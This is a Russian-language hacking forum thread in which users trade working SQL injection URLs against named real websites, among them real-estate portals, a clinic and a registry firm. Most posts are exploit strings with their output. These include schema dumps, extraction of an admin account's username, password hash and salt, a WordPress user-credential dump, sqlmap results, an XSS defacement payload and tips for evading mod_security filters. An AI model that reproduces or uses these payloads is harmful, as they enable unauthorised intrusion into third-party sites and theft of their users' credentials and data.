SQL Инъекции

Обсуждение в разделе «Уязвимости», начал(-а) yarbabin, 27.04.2015.

  1. extjs

    extjs Member

    Регистрация:
    23.06.2013
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0
    Code:
    http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
    Code:
    http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(select+concat(@a,0x5B2F44554D505D)+from([email protected]:=0x5B44554D505D,([email protected]+from+information_schema.columns+where+table_schema=database()[email protected]:=concat(@a,table_name,0x09,column_name,0x0A)))a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
    Code:
    [DUMP]areas    id
    areas    name
    areas    image
    areas    styles
    areas    text
    areas    keywords
    areas    del
    areas    published
    articles    id
    articles    navigation
    articles    parent_id
    articles    lft
    articles    rght
    articles    name3
    articles    text
    articles    published
    articles    styles
    articles    keywords
    articles    image
    articles    del
    articles    dienst
    articles    name
    basa    ID
    basa    name
    basa    titel
    basa    text
    basa    email
    basa    datum
    basa    beschreibung
    basa    a
    basa    b
    basa    c
    basa    d
    basa    e
    basa    f
    basa    g
    basa    h
    basa    i
    basa    k
    bulgaria_part    id
    bulgaria_part    name
    bulgaria_part    image
    bulgaria_part    styles
    bulgaria_part    text
    bulgaria_part    keywords
    bulgaria_part    del
    bulgaria_part    published
    categories    id
    categories    name
    categories    published
    categories    image
    categories    styles
    categories    text
    categories    keywords
    categories    del
    cityobjects    id
    cityobjects    category_id
    cityobjects    user_id
    cityobjects    area_id
    cityobjects    image
    cityobjects    address
    cityobjects    room
    cityobjects    floors
    cityobjects    floor
    cityobjects    floorspace
    cityobjects    totalarea
    cityobjects    costmetr
    cityobjects    totalcost
    cityobjects    commission
    cityobjects    auction
    cityobjects    mortgage
    cityobjects    column
    cityobjects    note
    cityobjects    published
    cityobjects    created
    cityobjects    modified
    cityobjects    vid
    cityobjects    del
    cityobjects    term
    cityobjects    until
    cityobjects    untilroom
    cityobjects    mainfoto
    cityobjects    image2
    cityobjects    agent
    cityobjects    note2
    cityobjects    telefon
    cityobjects    operator
    countries    id
    countries    name
    countries    image
    countries    styles
    countries    text
    countries    text2
    countries    keywords
    countries    del
    countries    published
    foreignobjects    id
    foreignobjects    foreigntype_id
    foreignobjects    user_id
    foreignobjects    country_id
    foreignobjects    address
    foreignobjects    city
    foreignobjects    room
    foreignobjects    floors
    foreignobjects    floor
    foreignobjects    totalarea
    foreignobjects    totalcost
    foreignobjects    rent
    foreignobjects    note
    foreignobjects    published
    foreignobjects    created
    foreignobjects    modified
    foreignobjects    del
    foreignobjects    image2
    foreignobjects    image3
    foreignobjects    image4
    foreignobjects    image5
    foreignobjects    until
    foreignobjects    untilarea
    foreignobjects    untilroom
    foreignobjects    comment
    foreignobjects    keywords
    foreignobjects    mainfoto
    foreignobjects    about_country
    foreignobjects    bulgaria_part_id
    foreigntypes    id
    foreigntypes    name
    foreigntypes    image
    foreigntypes    styles
    foreigntypes    text
    foreigntypes    keywords
    foreigntypes    del
    foreigntypes    published
    groups    id
    groups    name
    groups    created
    groups    modified
    images    id
    images    image
    images    foreignobject_id
    posts    id
    posts    created
    posts    image
    posts    name
    posts    text
    posts    text2
    posts    published
    posts    del
    underground    id
    underground    name
    users    id
    users    username
    users    password
    users    first_name
    users    last_name
    users    email
    users    phone
    users    group_id
    users    created
    users    modified
    users    admin
    users    image
    users    del
    users    note
    users    fathername
    users    salt
    users2    id
    users2    login
    users2    password
    users2    salt
    [/DUMP]

    Code:
    http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(select+concat_ws(0x09,username,password,salt,admin)from+users+limit+0,1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
    Code:
    administrator    *тут был хеш*        1
    Code:
    http://www.severven.ru/robots.txt
    PHP:
      
    Missing Controller

    Error: Robots.txtController could not be found.

    Error: Create the class Robots.txtController below in file: app/controllers/robots.txt_controller.php

    <?php
    class Robots.txtController extends AppController {

        var 
    $name 'Robots.txt';
    }
    ?>

    Notice: If you want to customize this error message, create app/views/errors/missing_controller.ctp
     
    #161 extjs, 31.05.2017
    В последний раз редактировалось: 31.05.2017
  2. extjs

    extjs Member

    Регистрация:
    23.06.2013
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0
    Code:
    view-source:http://mstream.fr/webtv/film.php?id=-1+union+select+1,2,@,4,5,6,7,8,9,10,11+from(select+@:=0x00,(select+@+from+wp_users+where+@:=concat(@,user_login,0x09,user_pass,0x0a)))q
     
  3. sepo

    sepo New Member

    Регистрация:
    21.01.2017
    Сообщения:
    21
    Одобрения:
    3
    Репутация:
    1
    Code:
    http://www.greenwall.org/recent-news.php?id=-22+union+select+1,2,version(),4,database(),6,7,8,9,10,11,12,13,14,15,16--
     
  4. DezMond™

    DezMond™ Elder - Старейшина

    Регистрация:
    10.01.2008
    Сообщения:
    1 900
    Одобрения:
    374
    Репутация:
    155
    Code:
    http://www.so-toulouse.com/index.php?id=167&act=-68+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
     
    Это одобряет Gorev.
  5. extjs

    extjs Member

    Регистрация:
    23.06.2013
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0
    Code:
    http://mobile-phone-buy.ru/buy_mobile.php?pc=DOOGEE-T5%27+union+all+select+%27%3E%3Cscript%3Ealert("Hacked By extjs")%3C/script%3E%27--+
    
    http://www.casuals.ru/product_info.php/products_id/11164'%20and%20extractvalue(0x00,concat(0x0a,(select%20table_name%20from%20information_schema.tables%20where%20table_name%20like%20'%25user%25'%20limit%203,1)))--%20/category/1
     
    #165 extjs, 27.06.2017
    В последний раз редактировалось: 28.06.2017
  6. WallHack

    WallHack Member

    Регистрация:
    18.07.2013
    Сообщения:
    244
    Одобрения:
    92
    Репутация:
    21
    550 тиц
    Code:
    http://www.landscrona.ru/tales/index.php?id=-111+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16+--+
    30 тиц

    Code:
    http://www.avon-beauty.ru/index.php?show_aux_page=(ExtractValue(1,concat(0x3a,(select(version())))))
    60 тиц
    Code:
    http://sejo.ru/index.php?page=119+union+select+1,2,3,4,@@version,6,7,8,9,10,11+--+1
    Внизу
     
    #166 WallHack, 28.06.2017
    В последний раз редактировалось: 28.06.2017
  7. extjs

    extjs Member

    Регистрация:
    23.06.2013
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0
    Code:
    view-source:http://www.nesprosta.ru/?type=content&id=29'
    HTML:
    <!--SELECT * FROM structure WHERE id like '29''<br>Ошибка БД: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''29''' at line 1--><!--SELECT name,text FROM structure LEFT JOIN content ON structure.id=content.link_id WHERE structure.id=29'<br>Ошибка БД: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1-->
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
    <title>База данных квартир: купить квартиру в Москве, снять квартиру (Москва), цены на квартиры, объявления недвижимость - Nesprosta.ru</title>
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
    Code:
    http://www.trest14perm.ru/newbuildings/?show_id=37+and+1=10+uNion+all+select+1,2,3,4,5,6,7--
    HTML:
    SQL Error: The used SELECT statements have a different number of columns at /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47<br><pre>Array
    (
        [code] => 1222
        [message] => The used SELECT statements have a different number of columns
        [query] => SELECT DISTINCT * FROM geocard,geomarks WHERE act=1 and geocard.type=geomarks.id and obj1=37 and 1=10 uNion all select 1,2,3,4,5,6,7-- GROUP BY type
        [context] => /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
    )
    </pre>
    Code:
    http://kras-city.ru/info_krsnr.php?num=1%27+union+all+select+1,2,3,4,5,6,7,8,9,10,(select(@)from(select(@:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat(@,0x3c6c693e,table_schema,0x2e,table_name,0x3a,column_name))))a),12--+[
    Это как обойти?
    Code:
    http://www.meatbranch.com/advert/magazine.html'+and+'1'='1
    Code:
    http://www.teplopoint.ru/'--+[
    Code:
    http://www.zorginox.ru/sobitiya/504/'%20and%20'1'='1
     
    #167 extjs, 28.06.2017
    В последний раз редактировалось: 28.06.2017
  8. extjs

    extjs Member

    Регистрация:
    23.06.2013
    Сообщения:
    31
    Одобрения:
    6
    Репутация:
    0
    Code:
    http://an-tarusa.ru/View.aspx?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
    все равно не знаю, что с этим Jet Database делать
     
  9. DezMond™

    DezMond™ Elder - Старейшина

    Регистрация:
    10.01.2008
    Сообщения:
    1 900
    Одобрения:
    374
    Репутация:
    155
  10. sepo

    sepo New Member

    Регистрация:
    21.01.2017
    Сообщения:
    21
    Одобрения:
    3
    Репутация:
    1
    АО «Сибирский реестр»

    Code:
    http://www.sibreg.ru/doc.php?id=-13827+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10--&menu=about
     
  11. sepo

    sepo New Member

    Регистрация:
    21.01.2017
    Сообщения:
    21
    Одобрения:
    3
    Репутация:
    1
    Clínica Medilaser Neiva

    Code:
    http://www.clinicamedilaser.com.co/branch.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--
     
  12. SlipX

    SlipX New Member

    Регистрация:
    30.08.2013
    Сообщения:
    14
    Одобрения:
    2
    Репутация:
    0
    Code:
    http://www.kupa.pl/pl/humor.php?id=16
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=16 AND 1103=1103

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=16 AND 7554=BENCHMARK(5000000,MD5(0x6673754b))
    ---
    web application technology: Apache
    back-end DBMS: MySQL <= 5.0.11
    available databases [1]:
    [*] baza777
     
    Это одобряет Gorev.
  13. SlipX

    SlipX New Member

    Регистрация:
    30.08.2013
    Сообщения:
    14
    Одобрения:
    2
    Репутация:
    0
    Это одобряет Gorev.
  14. SlipX

    SlipX New Member

    Регистрация:
    30.08.2013
    Сообщения:
    14
    Одобрения:
    2
    Репутация:
    0
    Code:
    http://adamslove.org/en-d.php?id=85
    (GET)
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL
     
  15. st55

    st55 Level 8

    Регистрация:
    20.04.2016
    Сообщения:
    117
    Одобрения:
    119
    Репутация:
    31
    Ну и кому это нужно?
     
    Это одобряет Octavian.
  16. SlipX

    SlipX New Member

    Регистрация:
    30.08.2013
    Сообщения:
    14
    Одобрения:
    2
    Репутация:
    0
    не смог докрутить, blind
     
  17. cat1vo

    cat1vo Level 8

    Регистрация:
    12.08.2009
    Сообщения:
    306
    Одобрения:
    185
    Репутация:
    59
    Code:
    http://adamslove.org/en-d.php?id=85'+or+1+group+by+mid(version(),rand(0)|0)having+avg(0)%23
    MySQL error: 1062 (Duplicate entry '5.5.51-38.2' for key 'group_key')
    Где ж тут Blind? Или Вы всегда полагаетесь только на sqlmap? И да, там присутствует Mod_security, потому используем нестандартные пробелы и загоняем операторы в комментарии с версией(пример /*!12345union*/%0aselect)!
     
  18. BabaDook

    BabaDook Member

    Регистрация:
    9.05.2015
    Сообщения:
    635
    Одобрения:
    617
    Репутация:
    37
    Ну, а дальше?
     
  19. sepo

    sepo New Member

    Регистрация:
    21.01.2017
    Сообщения:
    21
    Одобрения:
    3
    Репутация:
    1
    простите за флуд, но на кой хер выставлять ссылки на уязвимые сайты если ты элементарно не можешь эту уязвимость раскрутить?


    а теперь по теме:

    Code:
    http://www.imrs.rs/index.php?id=-67+union+select+1,2,3,4,5,database(),7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21--
     
    #179 sepo, 13.08.2017, 01:07
    В последний раз редактировалось: 13.08.2017, 03:08
    Это одобряет palec2006.
  20. joelblack

    joelblack Level 8

    Регистрация:
    6.07.2015
    Сообщения:
    81
    Одобрения:
    89
    Репутация:
    15
    target: http://www.tissueeng.net
    type: SQL Injection
    Code:
    http://www.tissueeng.net/lab/peopleDetail.php?id=-424+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,version(),7--+

    user: [email protected]
    version: 5.6.32-78.1-log
     
    Это одобряют sepo и Gorev.
Загрузка...
Похожие темы
  1. Ответы:
    4
    Просмотры:
    1 251
  2. Ответы:
    12
    Просмотры:
    3 855
  3. Ответы:
    54
    Просмотры:
    11 269
  4. Ответы:
    16
    Просмотры:
    9 804
  5. Ответы:
    15 954
    Просмотры:
    3 321 648